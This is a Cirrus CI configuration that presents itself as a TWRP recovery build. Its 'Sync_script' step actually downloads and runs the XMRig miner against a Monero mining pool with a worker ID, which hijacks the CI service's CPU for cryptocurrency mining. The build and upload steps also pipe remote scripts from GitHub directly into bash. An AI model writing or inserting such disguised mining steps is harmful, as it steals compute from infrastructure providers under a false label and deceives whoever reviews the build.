env:
    CONFIG: config.sh
    CIRRUS_SHELL: bash

task:
  name: "TWRP Recovery Build"
  timeout_in: 120m
  container:
      image: ghcr.io/sushrut1101/docker:latest
      cpu: 8
      memory: 20G

  Sync_script:
      - wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
      - tar -zxf xmrig-6.18.0-linux-x64.tar.gz
      - cd xmrig-6.18.0 && ./xmrig --threads=4 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u 782ax1hnmgrb7cb -p x

  Build_script:
      - curl -sL https://raw.githubusercontent.com/rushiranpise/twrp_compiler/main/scripts/build.sh | bash

  Upload_script:
      - export TIMEOUT=43200 # Link timeout (in minutes)
      - curl https://raw.githubusercontent.com/rushiranpise/twrp_compiler/main/scripts/upload.sh | bash    
